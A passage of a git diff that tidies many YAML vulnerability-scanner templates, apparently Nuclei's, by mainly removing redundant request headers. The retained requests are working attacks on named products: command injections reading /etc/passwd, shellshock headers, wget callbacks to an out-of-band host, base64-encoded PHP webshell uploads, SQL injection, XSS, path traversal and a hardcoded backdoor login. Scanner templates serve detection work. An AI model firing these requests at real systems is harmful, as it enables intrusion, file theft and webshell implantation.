think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6 - Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv - Content-Length: 183 ------WebKitFormBoundaryfcKRltGv Content-Disposition: form-data; name="file"; filename="test.php" @@ -31,7 +27,6 @@ requests: - | GET /Upload/test/test.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 req-condition: true matchers: diff --git a/vulnerabilities/other/couchdb-adminparty.yaml b/vulnerabilities/other/couchdb-adminparty.yaml index cf0c635784..a7af445594 100644 --- a/vulnerabilities/other/couchdb-adminparty.yaml +++ b/vulnerabilities/other/couchdb-adminparty.yaml @@ -11,8 +11,7 @@ requests: - method: GET path: - '{{BaseURL}}/_users/_all_docs' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers-condition: and matchers: - type: word diff --git a/vulnerabilities/other/eyou-email-rce.yaml b/vulnerabilities/other/eyou-email-rce.yaml index 9195b0191e..37cae61ecc 100644 --- a/vulnerabilities/other/eyou-email-rce.yaml +++ b/vulnerabilities/other/eyou-email-rce.yaml @@ -12,10 +12,6 @@ requests: - | POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chro·me/89.0.4389.114 Safari/537.36 - Content-Length: 25 - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded type='|cat /etc/passwd||' diff --git a/vulnerabilities/other/geovision-geowebserver-xss.yaml b/vulnerabilities/other/geovision-geowebserver-xss.yaml index c5e0e08aeb..f9c3d234be 100644 --- a/vulnerabilities/other/geovision-geowebserver-xss.yaml +++ b/vulnerabilities/other/geovision-geowebserver-xss.yaml @@ -12,7 +12,6 @@ requests: - | GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Accept: */* matchers-condition: and diff --git a/vulnerabilities/other/gloo-unauth.yaml b/vulnerabilities/other/gloo-unauth.yaml index 4a27ed3b2d..21b04e340f 100644 --- a/vulnerabilities/other/gloo-unauth.yaml +++ b/vulnerabilities/other/gloo-unauth.yaml @@ -11,7 +11,6 @@ requests: path: - '{{BaseURL}}/fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails' headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55" Content-type: "application/grpc-web+proto" Referer: "{{BaseURL}}/admin/" diff --git a/vulnerabilities/other/hashicorp-consul-rce.yaml b/vulnerabilities/other/hashicorp-consul-rce.yaml index d69e9f5708..fc90bf1e5d 100644 --- a/vulnerabilities/other/hashicorp-consul-rce.yaml +++ b/vulnerabilities/other/hashicorp-consul-rce.yaml @@ -5,17 +5,13 @@ info: author: pikpikcu severity: critical reference: https://www.exploit-db.com/exploits/46074 - tags: hashicorp,rce,oob + tags: hashicorp,rce,oob,intrusive requests: - raw: - | # Create USER PUT /v1/agent/service/register HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Connection: close - Upgrade-Insecure-Requests: 1 - Content-Length: 205 { "ID": "{{randstr}}", diff --git a/vulnerabilities/other/hasura-graphql-ssrf.yaml b/vulnerabilities/other/hasura-graphql-ssrf.yaml index f54c005b18..ab8bbe4a7a 100644 --- a/vulnerabilities/other/hasura-graphql-ssrf.yaml +++ b/vulnerabilities/other/hasura-graphql-ssrf.yaml @@ -11,13 +11,8 @@ requests: - | POST /v1/query HTTP/1.1 Host: {{Hostname}} - Content-Length: 381 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - content-type: application/json + Content-Type: application/json Accept: */* - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - Connection: close { "type":"bulk", diff --git a/vulnerabilities/other/hiboss-rce.yaml b/vulnerabilities/other/hiboss-rce.yaml index 95572c2656..6765dc8577 100644 --- a/vulnerabilities/other/hiboss-rce.yaml +++ b/vulnerabilities/other/hiboss-rce.yaml @@ -12,16 +12,11 @@ requests: - | GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../poc.txt&id=1 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 20 - | GET /poc.txt HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 20 matchers-condition: and matchers: diff --git a/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml b/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml index 89620cd0e4..a4301b8ce5 100644 --- a/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml +++ b/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml @@ -13,9 +13,7 @@ requests: POST /fileDownload?action=downloadBackupFile HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/plain, */* - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 20 fullPath=/etc/passwd @@ -23,9 +21,7 @@ requests: POST /fileDownload?action=downloadBackupFile HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/plain, */* - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 20 fullPath=/Windows/win.ini diff --git a/vulnerabilities/other/huawei-router-auth-bypass.yaml b/vulnerabilities/other/huawei-router-auth-bypass.yaml index 8ef99600e6..a094938e84 100644 --- a/vulnerabilities/other/huawei-router-auth-bypass.yaml +++ b/vulnerabilities/other/huawei-router-auth-bypass.yaml @@ -14,13 +14,8 @@ requests: - | GET /api/system/deviceinfo HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json, text/javascript, */*; q=0.01 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate Referer: {{BaseURL}} - X-Requested-With: XMLHttpRequest - Connection: close matchers-condition: and matchers: diff --git a/vulnerabilities/other/jeewms-lfi.yaml b/vulnerabilities/other/jeewms-lfi.yaml index 14c348eee1..a269c40da8 100644 --- a/vulnerabilities/other/jeewms-lfi.yaml +++ b/vulnerabilities/other/jeewms-lfi.yaml @@ -12,13 +12,11 @@ requests: - | #linux GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded - | #windows GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded matchers-condition: and diff --git a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml index fd92d1f28d..95f977e802 100644 --- a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml +++ b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml @@ -12,8 +12,6 @@ requests: - | POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4271.0 Safari/537.36 - X-Requested-With: XMLHttpRequest Content-Type: application/json {"name":"","before":"","after":"","direction":"desc","order_by":"date","num_of_rows":100} diff --git a/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/vulnerabilities/other/kevinlab-bems-backdoor.yaml index dd5701ed28..ae79e71a41 100644 --- a/vulnerabilities/other/kevinlab-bems-backdoor.yaml +++ b/vulnerabilities/other/kevinlab-bems-backdoor.yaml @@ -14,11 +14,7 @@ requests: POST /http/index.php HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close requester=login&request=login¶ms=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%2C%7B%22name%22%3A%22device_key%22%2C%22value%22%3A%22a2fe6b53-e09d-46df-8c9a-e666430e163e%22%7D%2C%7B%22name%22%3A%22auto_login%22%2C%22value%22%3Afalse%7D%2C%7B%22name%22%3A%22login_key%22%2C%22value%22%3A%22%22%7D%5D diff --git a/vulnerabilities/other/kevinlab-bems-sqli.yaml b/vulnerabilities/other/kevinlab-bems-sqli.yaml index 7a15fb4b13..2f24495c6d 100644 --- a/vulnerabilities/other/kevinlab-bems-sqli.yaml +++ b/vulnerabilities/other/kevinlab-bems-sqli.yaml @@ -16,12 +16,8 @@ requests: - | POST /http/index.php HTTP/1.1 Host: {{Hostname}} - Accept: application/json, text/javascript, */*; q=0.01 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close requester=login&request=login¶ms=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}] diff --git a/vulnerabilities/other/keycloak-xss.yaml b/vulnerabilities/other/keycloak-xss.yaml index f35e230373..ba87129f63 100644 --- a/vulnerabilities/other/keycloak-xss.yaml +++ b/vulnerabilities/other/keycloak-xss.yaml @@ -13,9 +13,6 @@ requests: POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1 Host: {{Hostname}} Content-Type: application/json - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Content-Type: application/x-www-form-urlencoded {"":1} diff --git a/vulnerabilities/other/landray-oa-fileread.yaml b/vulnerabilities/other/landray-oa-fileread.yaml index 03348be0ca..89b603702d 100644 --- a/vulnerabilities/other/landray-oa-fileread.yaml +++ b/vulnerabilities/other/landray-oa-fileread.yaml @@ -12,11 +12,7 @@ requests: - | POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 - Connection: close - Content-Length: 44 Accept: */* - Accept-Language: en Content-Type: application/x-www-form-urlencoded var={"body":{"file":"file:///etc/passwd"}} @@ -24,11 +20,7 @@ requests: - | POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 - Connection: close - Content-Length: 44 Accept: */* - Accept-Language: en Content-Type: application/x-www-form-urlencoded var={"body":{"file":"file:///c://windows/win.ini"}} diff --git a/vulnerabilities/other/maian-cart-preauth-rce.yaml b/vulnerabilities/other/maian-cart-preauth-rce.yaml index d9a923a421..c8b3ae4704 100644 --- a/vulnerabilities/other/maian-cart-preauth-rce.yaml +++ b/vulnerabilities/other/maian-cart-preauth-rce.yaml @@ -16,31 +16,21 @@ requests: - | GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate Accept: */* - Connection: close - | POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate Accept: application/json, text/javascript, /; q=0.01 - Connection: close Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest - Pragma: no-cache - Cache-Control: no-cache - Content-Length: 97 cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e - | GET /product-downloads/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate Accept: */* - Connection: close extractors: - type: regex diff --git a/vulnerabilities/other/mida-eframework-xss.yaml b/vulnerabilities/other/mida-eframework-xss.yaml index 743d669bdd..93bffe41df 100644 --- a/vulnerabilities/other/mida-eframework-xss.yaml +++ b/vulnerabilities/other/mida-eframework-xss.yaml @@ -11,7 +11,6 @@ requests: - | POST /MUP/ HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/x-www-form-urlencoded Referer: {{Hostname}}/MUP @@ -22,6 +21,7 @@ requests: - type: status status: - 200 + - type: word words: - '">' \ No newline at end of file diff --git a/vulnerabilities/other/mirai-unknown-rce.yaml b/vulnerabilities/other/mirai-unknown-rce.yaml index 49b88d2924..bb1ef6443a 100644 --- a/vulnerabilities/other/mirai-unknown-rce.yaml +++ b/vulnerabilities/other/mirai-unknown-rce.yaml @@ -13,9 +13,7 @@ requests: - raw: - | POST /cgi-bin/login.cgi HTTP/1.1 - Connection: keep-alive Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 key=';`wget http://{{interactsh-url}}`;# diff --git a/vulnerabilities/other/netgear-router-auth-bypass.yaml b/vulnerabilities/other/netgear-router-auth-bypass.yaml index 9bb69eefdd..1524463563 100644 --- a/vulnerabilities/other/netgear-router-auth-bypass.yaml +++ b/vulnerabilities/other/netgear-router-auth-bypass.yaml @@ -15,20 +15,13 @@ requests: - | GET /WAN_wan.htm?.gif HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 - Connection: close Accept: */* - Accept-Language: en - Accept-Encoding: gzip - | GET /WAN_wan.htm?.gif HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 - Connection: close Accept: */* - Accept-Language: en - Accept-Encoding: gzip + matchers-condition: and matchers: diff --git a/vulnerabilities/other/netgear-wnap320-rce.yaml b/vulnerabilities/other/netgear-wnap320-rce.yaml index fcbe0611ec..9b4442dcd8 100644 --- a/vulnerabilities/other/netgear-wnap320-rce.yaml +++ b/vulnerabilities/other/netgear-wnap320-rce.yaml @@ -14,10 +14,7 @@ requests: - | POST /boardDataWW.php HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.18.4 - Accept-Encoding: gzip, deflate Accept: */* - Connection: keep-alive Content-Type: application/x-www-form-urlencoded macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit diff --git a/vulnerabilities/other/oa-tongda-path-traversal.yaml b/vulnerabilities/other/oa-tongda-path-traversal.yaml index 80503ebdaa..56aa950f64 100644 --- a/vulnerabilities/other/oa-tongda-path-traversal.yaml +++ b/vulnerabilities/other/oa-tongda-path-traversal.yaml @@ -12,8 +12,6 @@ requests: - | POST /ispirit/interface/gateway.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 43 Content-Type: application/x-www-form-urlencoded json={"url":"/general/../../mysql5/my.ini"} diff --git a/vulnerabilities/other/oa-v9-uploads-file.yaml b/vulnerabilities/other/oa-v9-uploads-file.yaml index b008ebe22d..7f4da77bff 100644 --- a/vulnerabilities/other/oa-v9-uploads-file.yaml +++ b/vulnerabilities/other/oa-v9-uploads-file.yaml @@ -13,13 +13,8 @@ requests: - | POST /page/exportImport/uploadOperation.jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 - Content-Length: 216 - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 Origin: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo - Connection: close ------WebKitFormBoundaryFy3iNVBftjP6IOwo Content-Disposition: form-data; name="file"; filename="poc.jsp" @@ -31,7 +26,6 @@ requests: - | GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 req-condition: true matchers: diff --git a/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml index 7c4f59db40..f79ef39c18 100644 --- a/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml +++ b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml @@ -14,17 +14,13 @@ requests: - raw: - | POST /boaform/admin/formTracert HTTP/1.1 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Origin: http://{{Hostname}} - Connection: keep-alive - Referer: http://{{Hostname}}/diag_ping_admin_en.asp - Upgrade-Insecure-Requests: 1 Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Referer: {{BaseURL}}/diag_ping_admin_en.asp User: e8c Password: e8c - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 target_addr="1.1.1.1+`wget+http%3A%2F%2F{{interactsh-url}}%2F`"&waninf=127.0.0.1" diff --git a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml index 9c2df26245..59fe7b7f44 100644 --- a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml +++ b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml @@ -11,8 +11,10 @@ requests: - method: GET path: - "{{BaseURL}}" + headers: User-Agent: zerodiumvar_dump(233*233); + matchers-condition: and matchers: diff --git a/vulnerabilities/other/powercreator-cms-rce.yaml b/vulnerabilities/other/powercreator-cms-rce.yaml index 427bf5239a..629eb80d17 100644 --- a/vulnerabilities/other/powercreator-cms-rce.yaml +++ b/vulnerabilities/other/powercreator-cms-rce.yaml @@ -12,8 +12,6 @@ requests: - | POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 225 Content-Disposition: form-data;name="file1";filename="poc.aspx"; Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136 @@ -27,8 +25,6 @@ requests: - | GET /ResourcePic/{{endpoint}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: gzip extractors: - type: regex diff --git a/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml b/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml index aae82c8c57..dea9993e30 100644 --- a/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml +++ b/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml @@ -12,14 +12,12 @@ requests: - | POST /directdata/direct/router HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 - Content-Length: 178 {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/poc.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="} + - | GET /poc.txt HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 matchers-condition: and matchers: diff --git a/vulnerabilities/other/rce-shellshock-user-agent.yaml b/vulnerabilities/other/rce-shellshock-user-agent.yaml index ddca7fb8fe..03aef64b1d 100644 --- a/vulnerabilities/other/rce-shellshock-user-agent.yaml +++ b/vulnerabilities/other/rce-shellshock-user-agent.yaml @@ -8,10 +8,12 @@ info: requests: - method: GET - headers: - User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" path: - "{{BaseURL}}/cgi-bin/status" + + headers: + User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" + matchers: - type: regex regex: diff --git a/vulnerabilities/other/rconfig-rce.yaml b/vulnerabilities/other/rconfig-rce.yaml index 393ae08a2a..c08699eb6d 100644 --- a/vulnerabilities/other/rconfig-rce.yaml +++ b/vulnerabilities/other/rconfig-rce.yaml @@ -5,9 +5,6 @@ info: author: dwisiswant0 severity: high tags: rconfig,rce - - # This template supports the user creation part only. - # To triggering an RCE, see reference[2]. reference: - https://www.rconfig.com/downloads/rconfig-3.9.5.zip - https://www.exploit-db.com/exploits/48878 @@ -18,16 +15,13 @@ requests: POST /lib/crud/userprocess.php HTTP/1.1 Host: {{Hostname}} Accept: */* - User-Agent: python-requests/2.23.0 - Connection: close Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb - Upgrade-Insecure-Requests: 1 - Cookie: PHPSESSID=pdnuclei + Cookie: PHPSESSID={{randstr}} --01b28e152ee044338224bf647275f8eb Content-Disposition: form-data; name="username" - pdnuclei + {{randstr}} --01b28e152ee044338224bf647275f8eb Content-Disposition: form-data; name="passconf" @@ -39,7 +33,7 @@ requests: --01b28e152ee044338224bf647275f8eb Content-Disposition: form-data; name="email" - nuclei@projectdiscovery.io + test@{{randstr.tld}} --01b28e152ee044338224bf647275f8eb Content-Disposition: form-data; name="editid" @@ -58,7 +52,8 @@ requests: matchers: - type: word words: - - "User pdnuclei successfully added to Database" + - "User {{randstr}} successfully added to Database" + part: body - type: status status: diff --git a/vulnerabilities/other/ruijie-eg-rce.yaml b/vulnerabilities/other/ruijie-eg-rce.yaml index d2fd73f7de..c3c1bccd2b 100644 --- a/vulnerabilities/other/ruijie-eg-rce.yaml +++ b/vulnerabilities/other/ruijie-eg-rce.yaml @@ -14,18 +14,14 @@ requests: - | POST /login.php HTTP/1.1 Host: {{Hostname}} - Content-Length: 49 Content-Type: application/x-www-form-urlencoded - X-Requested-With: XMLHttpRequest username=admin&password=admin?show+webmaster+user - | POST /login.php HTTP/1.1 Host: {{Hostname}} - Content-Length: 49 Content-Type: application/x-www-form-urlencoded - X-Requested-With: XMLHttpRequest username=admin&password={{admin}} @@ -33,7 +29,6 @@ requests: POST /cli.php?a=shell HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded;charset=UTF-8 - Content-Length: 111 notdelay=true&command=cat /etc/passwd diff --git a/vulnerabilities/other/ruijie-networks-rce.yaml b/vulnerabilities/other/ruijie-networks-rce.yaml index 8f52c10b10..a93e658328 100644 --- a/vulnerabilities/other/ruijie-networks-rce.yaml +++ b/vulnerabilities/other/ruijie-networks-rce.yaml @@ -14,18 +14,14 @@ requests: - | POST /guest_auth/guestIsUp.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 - Content-Length: 111 ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00 - | GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 - Content-Length: 2 matchers-condition: and matchers: diff --git a/vulnerabilities/other/sar2html-rce.yaml b/vulnerabilities/other/sar2html-rce.yaml index 82c8b1411b..902279b7f8 100644 --- a/vulnerabilities/other/sar2html-rce.yaml +++ b/vulnerabilities/other/sar2html-rce.yaml @@ -5,8 +5,7 @@ info: author: gy741 severity: critical description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. - reference: - - https://www.exploit-db.com/exploits/49344 + reference: https://www.exploit-db.com/exploits/49344 tags: sar2html,rce,oob requests: @@ -14,10 +13,7 @@ requests: - | GET /index.php?plot=;wget%20http://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.18.4 - Accept-Encoding: gzip, deflate Accept: */* - Connection: keep-alive matchers: - type: word diff --git a/vulnerabilities/other/showdoc-file-upload-rce.yaml b/vulnerabilities/other/showdoc-file-upload-rce.yaml index d61b1a5d52..574d070ebd 100644 --- a/vulnerabilities/other/showdoc-file-upload-rce.yaml +++ b/vulnerabilities/other/showdoc-file-upload-rce.yaml @@ -12,10 +12,7 @@ requests: - | POST /index.php?s=/home/page/uploadImg HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 - Content-Length: 239 Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633 - Accept-Encoding: gzip ----------------------------835846770881083140190633 Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php" diff --git a/vulnerabilities/other/simple-employee-rce.yaml b/vulnerabilities/other/simple-employee-rce.yaml index da355a03d4..b9fc3b354d 100644 --- a/vulnerabilities/other/simple-employee-rce.yaml +++ b/vulnerabilities/other/simple-employee-rce.yaml @@ -12,15 +12,8 @@ requests: - | POST /dashboard/uploadID.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 - Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 - Accept-Encoding: deflate - X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337 - Content-Length: 267 - DNT: 1 - Connection: close -----------------------------5825462663702204104870787337 Content-Disposition: form-data; name="employee_ID"; filename="poc.php" @@ -31,11 +24,10 @@ requests: system($cmd); ?> -----------------------------5825462663702204104870787337-- + - | GET /uploads/employees_ids/{{endpoint}}?cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 2 extractors: - type: regex diff --git a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml index 95c345c98a..7d1c7a4706 100644 --- a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml +++ b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml @@ -16,8 +16,6 @@ requests: Host: {{Hostname}} User-Agent: "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'" Accept: */* - Accept-Language: en - Connection: close matchers-condition: and matchers: diff --git a/vulnerabilities/other/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml index 